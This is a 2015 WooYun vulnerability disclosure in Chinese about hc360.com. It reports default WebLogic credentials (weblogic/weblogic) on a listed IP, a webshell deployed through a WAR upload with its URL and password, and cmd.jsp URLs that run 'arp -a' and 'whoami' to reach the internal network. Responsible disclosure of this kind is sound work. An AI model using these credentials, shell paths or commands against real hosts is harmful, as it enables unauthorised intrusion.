缺陷编号:WooYun-2015-0127763
漏洞标题:慧聪网某系统服务弱口令已Shell可威胁内网
相关厂商:慧聪网
漏洞作者:路人甲
提交时间:2015-07-20 09:35
公开时间:2015-09-04 18:28
漏洞类型:服务弱口令
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开
弱口令导致getshell,跪求20rank买wooyun纪念版T恤
系统地址:http://www.eims.hc360.com/jsp/cn/manage/groupdisplay.jsp?err=invalid%20param如果直接用地址访问http://www.eims.hc360.com/console是出不来登录界面的,需要换成ip来登录系统名称好像是叫做EIMS-企业资讯管理系统
中间件weblogic存在弱口令http://118.194.32.146/console
用ip,登录界面就出来了帐号:weblogic密码:weblogic
影响到的系统比较多
1 2 3 4 |
http://jp.eims.hc360.com/<br> http://us.eims.hc360.com/<br> http://e-eyes.huicong.com/<br> 等等 |
通过部署war拿到shell
一句话地址:http://118.194.32.146/is2/index.jsp密码:023菜单的路径需要自己手输
磁盘多,文件也多
ftp:
某数据库
邮件服务
还有电视墙
关键的是,可以威胁内网http://118.194.32.146/is2/cmd.jsp?pwd=023&cmd=arp -a
http://118.194.32.146/is2/cmd.jsp?pwd=023&cmd=whoami
强口令,跪求20rank买wooyun纪念版T恤
危害等级:高
漏洞Rank:10
确认时间:2015-07-2118:27
非常感谢您。
暂无
慧聪网 肯定想 你喊我给你20我就给你20,那我不是很没面子
慧聪网 肯定想 你喊我给你20我就给你20,那我不是很没面子
10元够乌云纪念版内裤不?
原文连接
的情况下转载,若非则不得使用我方内容。